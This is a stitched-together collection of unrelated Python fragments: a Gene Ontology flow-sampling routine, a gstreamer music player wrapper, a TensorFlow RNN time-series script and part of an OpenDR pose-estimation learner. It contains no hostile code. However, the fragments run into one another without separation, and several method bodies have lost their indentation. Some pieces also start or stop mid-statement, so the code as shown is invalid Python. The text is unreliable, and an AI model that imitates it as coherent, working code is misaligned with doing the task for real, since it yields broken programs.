                 '\toverall hash: %s' % (sampling_policy.__name__, optional_sampling_param,
                                         self._flow_calculation_method.__name__,
                                         sparse_rounds,
                                         sample_chars[0], sample_chars[1], sample_chars[2],
                                         sample_chars[3], sample_chars[4], sample_chars[5],
                                         sample_chars[6], sample_chars[7]))
        # the loop below overwrites the active samples; preserve them for restoration
        preserved_sample = self._active_weighted_sample.copy()
        if self._secondary_weighted_sample is not None:
            preserved_sec_sample = self._secondary_weighted_sample.copy()
        else:
            preserved_sec_sample = None
        # the policy yields (iteration index, random primary sample, random secondary sample)
        for i, sample, sec_sample in sampling_policy(preserved_sample,
                                                     preserved_sec_sample,
                                                     self._background,
                                                     random_samples,
                                                     optional_sampling_param):
            # load the random sample as if it were the active one and recompute the flow
            self.set_flow_sources(sample, sec_sample)
            sample_chars = characterize_flow_parameters(sample, sec_sample, sparse_rounds)
            sample_hash = sample_chars[-1]
            log.info('Sampling thread: %s, Thread hex: %s; Random sample %d/%d \n'
                     'sampling characteristics: sys_hash: %s, sample_hash: %s, '
                     'target_hash: %s' %
                     (pool_no, self.thread_hex, i, random_samples,
                      self.md5_hash(), sample_hash, super_hash))
            # TODO: [load bar]: the external loop progress bar goes here
            # TODO: [fast resurrection] fast resurrection is impossible (memoized is false,
            #  but pipeline is broken)
            self.compute_current_and_potentials(memoized=False, sparse_rounds=sparse_rounds)
            sample_ids_md5 = hashlib.md5(
                json.dumps(
                    sorted(self._active_up_sample),
                    sort_keys=True).encode('utf-8')).hexdigest()
            if not no_add:
                log.info("Sampling thread %s: Adding a blanc:"
                         "\t sys hash: %s "
                         "\t sample hash: %s \t active sample hash: %s \t target_hash: %s \t "
                         "sparse_rounds: %s \t sampling policy: %s\t sampling_options: %s \t "
                         "matrix weight: %s"
                         % (pool_no, self.md5_hash(),
                            sample_hash, self.active_sample_md5_hash(sparse_rounds), super_hash,
                            sparse_rounds, sampling_policy.__name__, optional_sampling_param,
                            np.sum(self.current_accumulator)))
                # persist the null-model draw so later runs can reuse it
                insert_annotome_rand_samp(
                    {
                        'UP_hash': sample_ids_md5,
                        'sys_hash': self.md5_hash(),
                        'active_sample_hash': self.active_sample_md5_hash(sparse_rounds),
                        'target_sample_hash': super_hash,
                        'sampling_policy': sampling_policy.__name__,
                        'sampling_policy_options': optional_sampling_param,
                        'sparse_rounds': sparse_rounds,
                        'UPs': pickle.dumps(self._active_up_sample),
                        'sample': pickle.dumps(self._active_weighted_sample),
                        'sec_sample': pickle.dumps(self._secondary_weighted_sample),
                        'currents': pickle.dumps(
                            (self.current_accumulator,
                             self.node_current)),
                        'voltages': pickle.dumps(
                            self.UP2UP_voltages)})
        # restore the sample that was active before the sampling run
        self._active_weighted_sample = preserved_sample
        self._secondary_weighted_sample = preserved_sec_sample
def get_independent_linear_groups(self):
"""
Recovers independent linear groups of the GO terms. Independent linear groups are
those that share a significant amount of reached_uniprots_neo4j_id_list in common
"""
self.indep_lapl = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
for GO_list in self._limiter_up_2_go_reachable_nodes.values():
for GO1, GO2 in combinations(GO_list, 2):
idx1, idx2 = (self.node_id_2_mat_idx[GO1], self.node_id_2_mat_idx[GO2])
self.indep_lapl[idx1, idx2] += -1
self.indep_lapl[idx2, idx1] += -1
self.indep_lapl[idx2, idx2] += 1
self.indep_lapl[idx1, idx1] += 1
if __name__ == '__main__':
    # Smoke-run: build the interface over the full background and rebuild all the matrices.
    # Creates an instance of MatrixGetter and loads pre-computed values
    go_interface_instance = GeneOntologyInterface(
        background=get_background_bulbs_ids())
    go_interface_instance.full_rebuild()
    # Rough timings observed during development:
    # loading takes 1-6 seconds.
    # fill for reach only is done in 2 seconds,
    # tepping takes another 15,
    # inverting + info computation - 1 more second
    # Laplacian building =>
    ##
    # full computation - 3 minutes 18 seconds; save 7 seconds, retrieval - 3
    # seconds
    # Usage examples kept for reference (some use older, since-renamed APIs):
    # go_interface_instance.fast_load()
    # print go_interface_instance.pretty_time()
    # go_interface_instance.get_indep_linear_groups()
    # go_interface_instance.dump_Indep_Linset()
    # go_interface_instance.randomly_sample([10, 25], [5]*2, chromosome_specific=15)
    # go_interface_instance.set_Uniprot_source(experimental)
    # go_interface_instance.compute_current_and_potentials(sparse_rounds=10)
    # go_interface_instance.export_conduction_system()
    # go_interface_instance.deprecated_export_subsystem(experimental, ['186958', '142401', '147798', '164077'])
    # data_array = np.array([log(val) for val in go
#!/usr/bin/env python2
import time
import thread
import json
import gst
class Player(object):
    """Thin wrapper around a gstreamer playbin2 pipeline that tracks playback progress.

    A background thread polls the pipeline once per second; when a track finishes, the
    optional `on_end` callback supplies the next song object (which must expose `.url`
    and `.toObj()`).

    Fix: the polling loop used a bare `except:`, which also swallowed SystemExit and
    KeyboardInterrupt inside the thread; narrowed to `except Exception:`.
    """

    def __init__(self, on_end = None):
        self.current = None    # currently loaded song object, or None
        self.progress = 0      # seconds played so far
        self.length = 0        # track length in seconds
        self.playing = False
        self.on_end = on_end   # callable returning the next song, or None
        self.playbin = gst.element_factory_make("playbin2", "player")
        thread.start_new_thread(self._loop, ())

    def _loop(self):
        """Poll playback position once a second and auto-advance at end of track."""
        while True:
            time.sleep(1)
            if not self.playing:
                continue
            try:
                self.progress = self.playbin.query_position(gst.FORMAT_TIME, None)[0] / 1000000000
                self.length = self.playbin.query_duration(gst.FORMAT_TIME, None)[0] / 1000000000
            except Exception:
                # the position query can fail while the pipeline is still prerolling;
                # keep the previous progress/length values in that case
                pass
            if self.progress > 0 and self.progress >= self.length:
                self.stop()
                if self.on_end:
                    self.setSong(self.on_end())
                    self.play()

    def setSong(self, song):
        """Load a song object without starting playback."""
        self.current = song

    def play(self):
        """Start playback, pulling a song from on_end if none is loaded."""
        if not self.current and self.on_end:
            self.setSong(self.on_end())
        if self.current:
            self.playbin.set_property("uri", self.current.url)
            self.playing = True
            self.playbin.set_state(gst.STATE_PLAYING)

    def stop(self):
        """Stop playback and reset progress counters."""
        self.playing = False
        self.progress = self.length = 0
        self.playbin.set_state(gst.STATE_NULL)

    def pause(self):
        """Pause playback without resetting progress."""
        self.playing = False
        self.playbin.set_state(gst.STATE_PAUSED)

    def info(self):
        """Return a JSON status blob describing the current playback state."""
        if not self.playing:
            return json.dumps({ 'status': 'not playing' })
        else:
            return json.dumps({ 'status': 'playing', 'progress': self.progress, 'length': self.length, 'song': self.current.toObj() })
|
import numpy as np
import tensorflow as tf
import pandas as pd
import os
import time
# ---- Paths and hyper-parameters for the LSTM/RNN time-series script ----
Rootdir = os.path.abspath(os.path.dirname(os.getcwd()))
Modeldir = Rootdir + r"\Models\LSTM\LSTM.model"
# Absolute Windows path to the input CSV (machine-specific).
Datadir = "E:\PyCharmProjects\MasonicDLv0.1\Database\无证之罪_partI.csv"
Data_Sheet = "Sheet1"
train_step = 8000
# learning_rate = 0.01
# Exponentially decayed learning rate. NOTE(review): global_step is passed as
# the constant train_step rather than a training-step variable, so the decay
# is evaluated at a fixed step — confirm this is intended.
learning_rate = tf.train.exponential_decay(
    learning_rate=0.1,
    global_step=train_step,
    decay_steps=100,
    decay_rate=0.9,
    staircase=True)
regularizer_enabled = False
reg_rate = 0.01
hidden_layer_size = 50
seq_size = 10   # length of each input window
test_size = 10  # number of windows held out for testing
# Graph inputs: X is [batch, seq_size, 1] windows, Y is [batch, 1] targets.
X = tf.placeholder(tf.float32, [None, seq_size, 1])
Y = tf.placeholder(tf.float32, [None, 1])
# Fully-connected weights/biases applied on top of the RNN outputs.
W = {
    'w1': tf.Variable(tf.random_normal([hidden_layer_size, 30])),
    'w2': tf.Variable(tf.random_normal([30, 15])),
    'w3': tf.Variable(tf.random_normal([15, 1])),
    'w4': tf.Variable(tf.random_normal([10, 1])),
    "b1": tf.Variable(tf.random_normal([1])),
    "b2": tf.Variable(tf.random_normal([1])),
    "b3": tf.Variable(tf.random_normal([1])),
    "b4": tf.Variable(tf.random_normal([1]))
}
def normal(data):
    """Min-max normalize *data* to the [0, 1] range (in the array's own dtype)."""
    lo, hi = data.min(), data.max()
    return (data - lo) / (hi - lo)
def rnn(X, W):
    """Build the RNN + 4 fully-connected tanh layers prediction graph.

    X: placeholder of shape [batch, seq_size, 1].
    W: dict of weights 'w1'..'w4' and biases 'b1'..'b4' (see module-level W).
    Returns the final prediction tensor (one value per batch element after
    the squeeze/matmul with w4).
    """
    w1, w2, w3, w4 = W['w1'], W['w2'], W['w3'], W['w4']
    # Biases are expanded/tiled so they broadcast over the batch dimension.
    b1, b2, b3, b4 = tf.expand_dims(W['b1'], axis=0), tf.expand_dims(W['b2'], axis=0), tf.expand_dims(W['b3'], axis=0), \
        W['b4']
    # Tile the per-layer weights across the batch for batched matmul.
    w1 = tf.tile(input=tf.expand_dims(w1, axis=0), multiples=[tf.shape(X)[0], 1, 1])
    w2 = tf.tile(input=tf.expand_dims(w2, axis=0), multiples=[tf.shape(X)[0], 1, 1])
    w3 = tf.tile(input=tf.expand_dims(w3, axis=0), multiples=[tf.shape(X)[0], 1, 1])
    b1 = tf.tile(input=tf.expand_dims(b1, axis=1), multiples=[tf.shape(X)[0], 1, 1])
    b2 = tf.tile(input=tf.expand_dims(b2, axis=1), multiples=[tf.shape(X)[0], 1, 1])
    b3 = tf.tile(input=tf.expand_dims(b3, axis=1), multiples=[tf.shape(X)[0], 1, 1])
    cell = tf.nn.rnn_cell.BasicRNNCell(hidden_layer_size)
    outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)
    fc1 = tf.nn.tanh(tf.matmul(outputs, w1) + b1)
    # y_[batch_size, seq_size, hidden_layer_size]
    fc2 = tf.nn.tanh(tf.matmul(fc1, w2) + b2)
    fc3 = tf.nn.tanh(tf.matmul(fc2, w3) + b3)
    # Squeeze [batch, seq_size, 1] -> [batch, seq_size], then project the
    # per-timestep values down to a single output via w4 ([10, 1], i.e.
    # assumes seq_size == 10 — TODO confirm if seq_size changes).
    fc4 = tf.squeeze(fc3)
    fc4 = tf.nn.tanh(tf.matmul(fc4, w4) + b4)
    return fc4
# def rnn(X, W):
# cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_layer_size)
# outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)
# y_ = tf.nn.tanh(tf.matmul(outputs[-1], W['w1']) + W['b1'])
# y_ = tf.nn.tanh(tf.matmul(y_, W['w2']) + W['b2'])
# y_ = tf.squeeze(y_)
#
# return y_
# ---- Data preparation ----
data = pd.read_csv(Datadir, header=None)
data = data[1]  # second CSV column holds the series of interest
data = normal(data)  # min-max scale to [0, 1]
data = np.array(data)
data = data.tolist()
data_size = np.shape(data)[0]
# Build sliding windows: each sample is seq_size consecutive values and its
# target is the value immediately following the window.
seq, pre = [], []
for i in range(data_size - seq_size - 1):
    seq.append(data[i: i + seq_size])
    pre.append(data[i + seq_size])
data_size = data_size - seq_size - 1
# Train/test split.
# Bug fix: teY previously used pre[data_size - test_size:], which is shifted
# by one sample relative to teX (seq[data_size - 1 - test_size:data_size - 1]),
# so every test target belonged to the *next* window. The slices are now
# aligned index-for-index with teX.
trX = seq[:data_size - 1 - test_size]
trY = pre[:data_size - 1 - test_size]
teX = seq[data_size - 1 - test_size:data_size - 1]
teY = pre[data_size - 1 - test_size:data_size - 1]
# Shape to [batch, seq_size, 1] inputs and [batch, 1] targets.
trX = np.expand_dims(trX, axis=2)
teX = np.expand_dims(teX, axis=2)
trY = np.expand_dims(trY, axis=1)
teY = np.expand_dims(teY, axis=1)
# ---- Graph, loss, optimizer ----
y_ = rnn(X, W)
if regularizer_enabled:
    # MSE plus L1 penalty on the fully-connected weights.
    loss = tf.reduce_mean(tf.square(Y - y_)) + \
        tf.contrib.layers.l1_regularizer(reg_rate)(W['w1']) + \
        tf.contrib.layers.l1_regularizer(reg_rate)(W['w2']) + \
        tf.contrib.layers.l1_regularizer(reg_rate)(W['w3'])
else:
    loss = tf.reduce_mean(tf.square(Y - y_))
train_op = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
# ---- Training loop ----
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for step in range(train_step):
        _, train_loss = sess.run([train_op, loss], feed_dict={X: trX, Y: trY})
        # Early stop once both train and test losses drop below thresholds.
        if train_loss < 0.0009:
            test_loss = sess.run(loss, feed_dict={X: teX, Y: teY})
            if test_loss < 0.04:
                print(step, train_loss, test_loss)
                print(sess.run(y_, feed_dict={X: teX}))
                print(teY)
                break
        # Periodic progress report.
        if step % 100 == 0:
            test_loss = sess.run(loss, feed_dict={X: teX, Y: teY})
            print(step, train_loss, test_loss)
        # Final-step dump of predictions vs. ground truth.
        if step == train_step - 1:
            print(sess.run(y_, feed_dict={X: teX}))
            print(teY)
# Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# General imports
import torchvision.transforms
import os
import cv2
import torch
import json
import numpy as np
from tqdm import tqdm
from urllib.request import urlretrieve
# OpenDR engine imports
from opendr.engine.data import Image
from opendr.engine.target import Pose
from opendr.engine.constants import OPENDR_SERVER_URL
# OpenDR lightweight_open_pose imports
from opendr.perception.pose_estimation.lightweight_open_pose.lightweight_open_pose_learner import \
LightweightOpenPoseLearner
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.modules.load_state import \
load_state
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.modules.keypoints import \
extract_keypoints, group_keypoints
from opendr.perception.pose_estimation.lightweight_open_pose.algorithm.val import \
convert_to_coco_format, run_coco_eval, normalize, pad_width
class HighResolutionPoseEstimationLearner(LightweightOpenPoseLearner):
    def __init__(self, device='cuda', backbone='mobilenet',
                 temp_path='temp', mobilenet_use_stride=True, mobilenetv2_width=1.0, shufflenet_groups=3,
                 num_refinement_stages=2, batches_per_iter=1, base_height=256,
                 first_pass_height=360, second_pass_height=540, percentage_around_crop=0.3, heatmap_threshold=0.1,
                 experiment_name='default', num_workers=8, weights_only=True, output_name='detections.json',
                 multiscale=False, scales=None, visualize=False,
                 img_mean=np.array([128, 128, 128], np.float32), img_scale=np.float32(1 / 256), pad_value=(0, 0, 0),
                 half_precision=False):
        """Initialize the high-resolution learner.

        Forwards the shared configuration to LightweightOpenPoseLearner and
        stores the parameters specific to the two-pass high-resolution scheme:
        :param first_pass_height: target height for the fast, low-res heatmap pass
        :param second_pass_height: target height for the full pose-estimation pass
        :param percentage_around_crop: extra padding ratio added around the detected crop
        :param heatmap_threshold: PAF values below this are zeroed before contour search
        """
        super(HighResolutionPoseEstimationLearner, self).__init__(device=device, backbone=backbone, temp_path=temp_path,
                                                                  mobilenet_use_stride=mobilenet_use_stride,
                                                                  mobilenetv2_width=mobilenetv2_width,
                                                                  shufflenet_groups=shufflenet_groups,
                                                                  num_refinement_stages=num_refinement_stages,
                                                                  batches_per_iter=batches_per_iter,
                                                                  base_height=base_height,
                                                                  experiment_name=experiment_name,
                                                                  num_workers=num_workers, weights_only=weights_only,
                                                                  output_name=output_name, multiscale=multiscale,
                                                                  scales=scales, visualize=visualize, img_mean=img_mean,
                                                                  img_scale=img_scale, pad_value=pad_value,
                                                                  half_precision=half_precision)
        self.first_pass_height = first_pass_height
        self.second_pass_height = second_pass_height
        self.perc = percentage_around_crop
        self.threshold = heatmap_threshold
        # Smoothed crop box (exponential moving average across frames in infer()).
        self.xmin = None
        self.ymin = None
        self.xmax = None
        self.ymax = None
        # Frame counter: infer() recomputes the ROI every 5th frame.
        self.counter = 0
        # Last first-pass heatmap; empty until the first ROI computation.
        self.prev_heatmap = np.array([])
def __first_pass(self, img):
"""
This method is generating a rough heatmap of the input image in order to specify the approximate location
of humans in the picture.
:param img: input image for heatmap generation
:type img: numpy.ndarray
:return: returns the Part Affinity Fields (PAFs) of the humans inside the image
:rtype: numpy.ndarray
"""
if 'cuda' in self.device:
tensor_img = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().cuda()
tensor_img = tensor_img.cuda()
if self.half:
tensor_img = tensor_img.half()
else:
tensor_img = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().cpu()
stages_output = self.model(tensor_img)
stage2_pafs = stages_output[-1]
pafs = np.transpose(stage2_pafs.squeeze().cpu().data.numpy(), (1, 2, 0))
return pafs
    def __second_pass(self, img, net_input_height_size, max_width, stride, upsample_ratio,
                      pad_value=(0, 0, 0),
                      img_mean=np.array([128, 128, 128], np.float32), img_scale=np.float32(1 / 256)):
        """
        This method detects the keypoints and estimates the pose of humans using the cropped image from the
        previous step (__first_pass_).

        :param img: input image for heatmap generation
        :type img: numpy.ndarray
        :param net_input_height_size: the height that the input image will be resized for inference
        :type net_input_height_size: int
        :param max_width: this parameter is the maximum width that the resized image should have. It is introduced to
            avoid cropping images with abnormal ratios e.g (30, 800)
        :type max_width: int
        :param stride: network stride used when padding the resized image
        :type stride: int
        :param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs when resizing,
            defaults to 4
        :type upsample_ratio: int, optional
        :param pad_value: padding color used by pad_width
        :param img_mean: per-channel mean subtracted during normalization
        :param img_scale: scale factor applied during normalization
        :returns: the heatmap of human figures, the part affinity filed (pafs), the scale of the resized image compared
            to the initial and the pad around the image
        :rtype: heatmap, pafs -> numpy.ndarray
                scale -> float
                pad = -> list
        """
        height, width, _ = img.shape
        scale = net_input_height_size / height
        img_ratio = width / height
        # Extremely wide crops are rescaled by width instead of height so the
        # network input does not blow up past max_width.
        if img_ratio > 6:
            scale = max_width / width
        scaled_img = cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)
        scaled_img = normalize(scaled_img, img_mean, img_scale)
        min_dims = [net_input_height_size, max(scaled_img.shape[1], net_input_height_size)]
        # Pad to a multiple of the network stride.
        padded_img, pad = pad_width(scaled_img, stride, pad_value, min_dims)
        if 'cuda' in self.device:
            tensor_img = torch.from_numpy(padded_img).permute(2, 0, 1).unsqueeze(0).float().cuda()
            tensor_img = tensor_img.cuda()
            if self.half:
                tensor_img = tensor_img.half()
        else:
            tensor_img = torch.from_numpy(padded_img).permute(2, 0, 1).unsqueeze(0).float().cpu()
        stages_output = self.model(tensor_img)
        # Second-to-last output = keypoint heatmaps, last output = PAFs.
        stage2_heatmaps = stages_output[-2]
        heatmaps = np.transpose(stage2_heatmaps.squeeze().cpu().data.numpy(), (1, 2, 0))
        heatmaps = heatmaps.astype(np.float32)
        heatmaps = cv2.resize(heatmaps, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
        stage2_pafs = stages_output[-1]
        pafs = np.transpose(stage2_pafs.squeeze().cpu().data.numpy(), (1, 2, 0))
        pafs = pafs.astype(np.float32)
        pafs = cv2.resize(pafs, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
        return heatmaps, pafs, scale, pad
def __pooling(self, img, kernel): # Pooling on input image for dimension reduction
"""This method applies a pooling filter on an input image in order to resize it in a fixed shape
:param img: input image for resizing
:rtype img: engine.data.Image class object
:param kernel: the kernel size of the pooling filter
:type kernel: int
"""
pool_img = torchvision.transforms.ToTensor()(img)
if 'cuda' in self.device:
pool_img = pool_img.cuda()
if self.half:
pool_img = pool_img.half()
pool_img = pool_img.unsqueeze(0)
pool_img = torch.nn.functional.avg_pool2d(pool_img, kernel)
pool_img = pool_img.squeeze(0).permute(1, 2, 0).cpu().float().numpy()
return pool_img
    def fit(self, dataset, val_dataset=None, logging_path='', logging_flush_secs=30,
            silent=False, verbose=True, epochs=None, use_val_subset=True, val_subset_size=250,
            images_folder_name="train2017", annotations_filename="person_keypoints_train2017.json",
            val_images_folder_name="val2017", val_annotations_filename="person_keypoints_val2017.json"):
        """This method is not used in this implementation.

        :raises NotImplementedError: always.
        """
        raise NotImplementedError
    def optimize(self, do_constant_folding=False):
        """This method is not used in this implementation.

        :raises NotImplementedError: always.
        """
        raise NotImplementedError
def reset(self):
"""This method is not used in this implementation."""
return NotImplementedError
def save(self, path, verbose=False):
"""This method is not used in this implementation."""
return NotImplementedError
    def eval(self, dataset, silent=False, verbose=True, use_subset=True, subset_size=250, upsample_ratio=4,
             images_folder_name="val2017", annotations_filename="person_keypoints_val2017.json"):
        """
        This method is used to evaluate a trained model on an evaluation dataset.

        :param dataset: object that holds the evaluation dataset.
        :type dataset: ExternalDataset class object or DatasetIterator class object
        :param silent: if set to True, disables all printing of evaluation progress reports and other
            information to STDOUT, defaults to 'False'
        :type silent: bool, optional
        :param verbose: if set to True, enables the maximum verbosity, defaults to 'True'
        :type verbose: bool, optional
        :param use_subset: If set to True, a subset of the validation dataset is created and used in
            evaluation, defaults to 'True'
        :type use_subset: bool, optional
        :param subset_size: Controls the size of the validation subset, defaults to '250'
        :type subset_size: int, optional
        :param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs
            when resizing, defaults to 4
        :type upsample_ratio: int, optional
        :param images_folder_name: Folder name that contains the dataset images. This folder should be contained
            in the dataset path provided. Note that this is a folder name, not a path, defaults to 'val2017'
        :type images_folder_name: str, optional
        :param annotations_filename: Filename of the annotations json file. This file should be contained in the
            dataset path provided, defaults to 'person_keypoints_val2017.json'
        :type annotations_filename: str, optional
        :returns: returns stats regarding evaluation
        :rtype: dict
        """
        # Reuse the parent's (name-mangled, hence the explicit prefix) dataset
        # preparation helper.
        data = super(HighResolutionPoseEstimationLearner,  # NOQA
                     self)._LightweightOpenPoseLearner__prepare_val_dataset(dataset, use_subset=use_subset,
                                                                            subset_name="val_subset.json",
                                                                            subset_size=subset_size,
                                                                            images_folder_default_name=images_folder_name,
                                                                            annotations_filename=annotations_filename,
                                                                            verbose=verbose and not silent)
        # Model initialization if needed
        if self.model is None and self.checkpoint_load_iter != 0:
            # No model loaded, initializing new
            self.init_model()
            # User set checkpoint_load_iter, so they want to load a checkpoint
            # Try to find the checkpoint_load_iter checkpoint
            checkpoint_name = "checkpoint_iter_" + str(self.checkpoint_load_iter) + ".pth"
            checkpoints_folder = os.path.join(self.parent_dir, '{}_checkpoints'.format(self.experiment_name))
            full_path = os.path.join(checkpoints_folder, checkpoint_name)
            try:
                checkpoint = torch.load(full_path, map_location=torch.device(self.device))
            except FileNotFoundError as e:
                e.strerror = "File " + checkpoint_name + " not found inside checkpoints_folder, " \
                             "provided checkpoint_load_iter (" + \
                             str(self.checkpoint_load_iter) + \
                             ") doesn't correspond to a saved checkpoint.\nNo such file or directory."
                raise e
            if not silent and verbose:
                print("Loading checkpoint:", full_path)
            load_state(self.model, checkpoint)
        elif self.model is None:
            raise AttributeError("self.model is None. Please load a model or set checkpoint_load_iter.")
        self.model = self.model.eval()  # Change model state to evaluation
        self.model.to(self.device)
        if "cuda" in self.device:
            self.model = self.model.to(self.device)
            if self.half:
                self.model.half()
        if self.multiscale:
            self.scales = [0.5, 1.0, 1.5, 2.0]
        coco_result = []
        num_keypoints = Pose.num_kpts
        pbar_eval = None
        if not silent:
            pbar_desc = "Evaluation progress"
            pbar_eval = tqdm(desc=pbar_desc, total=len(data), bar_format="{l_bar}%s{bar}{r_bar}" % '\x1b[38;5;231m')
        # Dataset-resolution-dependent keypoint offset.
        # NOTE(review): assumes all images in the dataset share the first
        # image's height — confirm for mixed-resolution datasets.
        img_height = data[0]['img'].shape[0]
        if img_height in (1080, 1440):
            offset = 200
        elif img_height == 720:
            offset = 50
        else:
            offset = 0
        for sample in data:
            file_name = sample['file_name']
            img = sample['img']
            h, w, _ = img.shape
            max_width = w
            # Downscale factor so the pooled image matches first_pass_height.
            kernel = int(h / self.first_pass_height)
            if kernel > 0:
                pool_img = self.__pooling(img, kernel)
            else:
                pool_img = img
            # ------- Heatmap Generation -------
            avg_pafs = self.__first_pass(pool_img)
            avg_pafs = avg_pafs.astype(np.float32)
            pafs_map = cv2.blur(avg_pafs, (5, 5))
            pafs_map[pafs_map < self.threshold] = 0
            heatmap = pafs_map.sum(axis=2)
            heatmap = heatmap * 100
            heatmap = heatmap.astype(np.uint8)
            heatmap = cv2.blur(heatmap, (5, 5))
            # Contours around high-PAF regions give candidate person boxes.
            contours, hierarchy = cv2.findContours(heatmap, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
            count = []
            coco_keypoints = []
            if len(contours) > 0:
                for x in contours:
                    count.append(x)
                xdim = []
                ydim = []
                for j in range(len(count)):  # Loop for every human (every contour)
                    for i in range(len(count[j])):
                        xdim.append(count[j][i][0][0])
                        ydim.append(count[j][i][0][1])
                h, w, _ = pool_img.shape
                # Map contour extremes from heatmap coordinates back to the
                # original image (undo network stride and pooling kernel).
                xmin = int(np.floor(min(xdim))) * int((w / heatmap.shape[1])) * kernel
                xmax = int(np.floor(max(xdim))) * int((w / heatmap.shape[1])) * kernel
                ymin = int(np.floor(min(ydim))) * int((h / heatmap.shape[0])) * kernel
                ymax = int(np.floor(max(ydim))) * int((h / heatmap.shape[0])) * kernel
                extra_pad_x = int(self.perc * (xmax - xmin))  # Adding an extra pad around cropped image
                extra_pad_y = int(self.perc * (ymax - ymin))
                if xmin - extra_pad_x > 0:
                    xmin = xmin - extra_pad_x
                if xmax + extra_pad_x < img.shape[1]:
                    xmax = xmax + extra_pad_x
                if ymin - extra_pad_y > 0:
                    ymin = ymin - extra_pad_y
                if ymax + extra_pad_y < img.shape[0]:
                    ymax = ymax + extra_pad_y
                # Reject degenerate crops (<= 40px a side) and fall back to
                # the (offset-trimmed) full frame.
                if (xmax - xmin) > 40 and (ymax - ymin) > 40:
                    crop_img = img[ymin:ymax, xmin:xmax]
                else:
                    crop_img = img[offset:img.shape[0], offset:img.shape[1]]
                h, w, _ = crop_img.shape
                # ------- Second pass of the image, inference for pose estimation -------
                avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, self.second_pass_height, max_width,
                                                                        self.stride, upsample_ratio)
                total_keypoints_num = 0
                all_keypoints_by_type = []
                for kpt_idx in range(18):
                    total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
                                                             total_keypoints_num)
                pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
                # Map keypoints from network space back to crop space.
                for kpt_id in range(all_keypoints.shape[0]):
                    all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[1]) / scale
                    all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[0]) / scale
                for i in range(all_keypoints.shape[0]):
                    for j in range(all_keypoints.shape[1]):
                        if j == 0:  # Adjust offset if needed for evaluation on our HR datasets
                            all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
                        if j == 1:  # Adjust offset if needed for evaluation on our HR datasets
                            all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
                current_poses = []
                for n in range(len(pose_entries)):
                    if len(pose_entries[n]) == 0:
                        continue
                    pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
                    for kpt_id in range(num_keypoints):
                        if pose_entries[n][kpt_id] != -1.0:  # keypoint was found
                            pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
                            pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
                    pose = Pose(pose_keypoints, pose_entries[n][18])
                    current_poses.append(pose)
                coco_keypoints, scores = convert_to_coco_format(pose_entries, all_keypoints)
                image_id = int(file_name[0:file_name.rfind('.')])
                for idx in range(len(coco_keypoints)):
                    coco_result.append({
                        'image_id': image_id,
                        'category_id': 1,  # person
                        'keypoints': coco_keypoints[idx],
                        'score': scores[idx]
                    })
            if self.visualize:
                for keypoints in coco_keypoints:
                    for idx in range(len(keypoints) // 3):
                        cv2.circle(img, (int(keypoints[idx * 3] + offset), int(keypoints[idx * 3 + 1]) + offset),
                                   3, (255, 0, 255), -1)
                cv2.imshow('keypoints', img)
                key = cv2.waitKey()
                if key == 27:  # esc
                    return
            if not silent:
                pbar_eval.update(1)
        with open(self.output_name, 'w') as f:
            json.dump(coco_result, f, indent=4)
        if len(coco_result) != 0:
            if use_subset:
                result = run_coco_eval(os.path.join(dataset.path, "val_subset.json"),
                                       self.output_name, verbose=not silent)
            else:
                result = run_coco_eval(os.path.join(dataset.path, annotations_filename),
                                       self.output_name, verbose=not silent)
            return {"average_precision": result.stats[0:5], "average_recall": result.stats[5:]}
        else:
            if not silent and verbose:
                print("Evaluation ended with no detections.")
            return {"average_precision": [0.0 for _ in range(5)], "average_recall": [0.0 for _ in range(5)]}
def infer(self, img, upsample_ratio=4, stride=8, track=True, smooth=True, multiscale=False):
"""
This method is used to perform pose estimation on an image.
:param img: image to run inference on
:rtype img: engine.data.Image class object
:param upsample_ratio: Defines the amount of upsampling to be performed on the heatmaps and PAFs
when resizing,defaults to 4
:type upsample_ratio: int, optional
:param stride: Defines the stride value for creating a padded image
:type stride: int,optional
:param track: If True, infer propagates poses ids from previous frame results to track poses,
defaults to 'True'
:type track: bool, optional
:param smooth: If True, smoothing is performed on pose keypoints between frames, defaults to 'True'
:type smooth: bool, optional
:param multiscale: Specifies whether evaluation will run in the predefined multiple scales setup or not.
:type multiscale: bool,optional
:return: Returns a list of engine.target.Pose objects, where each holds a pose
and a heatmap that contains human silhouettes of the input image.
If no detections were made returns an empty list for poses and a black frame for heatmap.
:rtype: poses -> list of engine.target.Pose objects
heatmap -> np.array()
"""
current_poses = []
